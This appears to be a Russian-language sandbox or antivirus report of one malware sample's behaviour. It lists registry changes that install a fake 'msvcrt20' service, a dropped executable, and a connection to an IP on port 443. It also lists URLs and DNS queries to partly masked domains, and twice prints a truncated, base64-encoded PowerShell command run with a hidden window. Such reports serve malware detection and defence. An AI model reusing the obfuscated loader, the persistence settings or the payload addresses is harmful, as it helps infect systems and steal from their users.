Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\EFS] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\msvcrt20] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\msvcrt20] 'ImagePath' = '"%WINDIR%\SysWOW64\WMADMOE\msvcrt20.exe"'
- 'msvcrt20' "%WINDIR%\SysWOW64\WMADMOE\msvcrt20.exe"
- 'msvcrt20' %WINDIR%\SysWOW64\WMADMOE\msvcrt20.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBlAHQALQBJAFQARQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgBFADMAOABaADYAIAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADAAfQB7ADQAfQB7ADUAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwB0AEUATQ...
- %HOMEPATH%\dku9b1_\aapn1vv\avqv7t89l.exe
- %WINDIR%\syswow64\wmadmoe\msvcrt20.exe
- %HOMEPATH%\dku9b1_\aapn1vv\avqv7t89l.exe в %WINDIR%\syswow64\wmadmoe\msvcrt20.exe
- '15#.#2.75.74':443
- http://xi##ecun.cn/wp-content/VCNbWWDK/
- http://15#.##.75.74:443/qDhX6nWhfBtUU/OGZNUO5l/ via 15#.#2.75.74
- DNS ASK ge####naveda.xyz
- DNS ASK xi##ecun.cn
- DNS ASK ap###ti.com.br
- '%HOMEPATH%\dku9b1_\aapn1vv\avqv7t89l.exe'
- '%WINDIR%\syswow64\wmadmoe\msvcrt20.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBlAHQALQBJAFQARQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgBFADMAOABaADYAIAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADAAfQB7ADQAfQB7ADUAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwB0AEUATQ...' (со скрытым окном)